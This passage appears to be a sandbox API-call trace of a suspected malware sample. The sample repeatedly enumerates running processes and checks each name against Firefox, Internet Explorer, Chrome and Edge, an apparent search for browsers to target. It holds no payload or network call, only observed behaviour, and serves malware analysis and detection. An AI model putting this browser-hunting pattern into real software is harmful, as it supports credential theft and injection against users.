dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0203.479] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0203.479] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0203.479] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0203.479] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.479] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.480] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0203.480] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0203.480] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0203.480] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.480] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.480] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.480] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.480] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.480] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.481] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.481] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0203.481] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0203.481] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0203.481] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.481] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.482] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.482] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.482] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.482] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.482] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.482] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0203.482] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0203.482] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0203.482] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.482] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.483] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.483] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.483] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.483] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.483] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.483] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.483] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.483] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.483] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.483] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.484] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0203.484] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0203.484] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0203.484] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.484] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.484] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0203.485] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0203.485] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0203.485] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.485] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.485] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.485] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.485] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.485] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.485] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.486] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.486] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.486] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.591] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.591] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.591] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.591] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.591] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0203.592] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0203.592] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0203.592] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0203.592] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0203.592] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.593] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0203.593] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0203.593] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0203.593] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0203.593] CloseHandle (hObject=0xd4) returned 1 [0203.593] Sleep (dwMilliseconds=0x3e8) [0204.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0204.647] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.648] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0204.648] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0204.648] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0204.648] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0204.648] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.649] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0204.649] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0204.649] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0204.649] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0204.649] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.649] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0204.649] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0204.650] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0204.650] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.650] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.650] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0204.650] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0204.650] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0204.650] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.650] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.651] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0204.651] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0204.651] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0204.651] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.651] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0204.651] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0204.651] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0204.651] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.652] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0204.652] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0204.652] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0204.652] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.652] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.652] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0204.652] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0204.652] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0204.652] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.652] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.653] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0204.653] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0204.653] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0204.653] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.653] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0204.654] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0204.654] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0204.654] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0204.654] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.654] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.654] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.654] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.654] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.654] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.654] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.655] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.656] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.656] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.657] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.657] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0204.657] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0204.657] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0204.657] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.657] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.658] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.659] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0204.659] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0204.659] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0204.659] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.659] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.659] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0204.659] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0204.659] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0204.659] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.659] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0204.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0204.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0204.660] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.660] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.660] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.660] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.660] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.660] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.661] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.661] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0204.661] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0204.661] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0204.661] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.661] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0204.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0204.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0204.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0204.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0204.662] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0204.662] lstrcmpiA 